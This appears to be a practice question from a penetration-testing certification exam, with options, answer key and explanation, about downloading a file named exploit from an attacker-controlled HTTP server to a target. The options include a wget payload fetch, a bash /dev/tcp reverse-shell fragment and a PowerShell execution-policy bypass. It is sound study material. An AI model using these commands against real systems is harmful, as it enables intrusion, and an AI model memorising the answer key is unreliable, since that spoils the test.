CompTIA PenTest+ (PT0-002) — Question 29

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

Answer options

• A. nc 10.10.51.50 9891 < exploit
• B. powershell -exec bypass -f \\10.10.51.50\9891
• C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
• D. wget 10.10.51.50:9891/exploit

Correct answer: D

Explanation

The correct command is D, as wget is specifically designed to download files from web servers. Option A uses netcat inappropriately for downloading, while B incorrectly formats the PowerShell command and attempts to access a file share instead of a web server. Option C is using bash to connect to a TCP port, which does not facilitate file downloading in this context.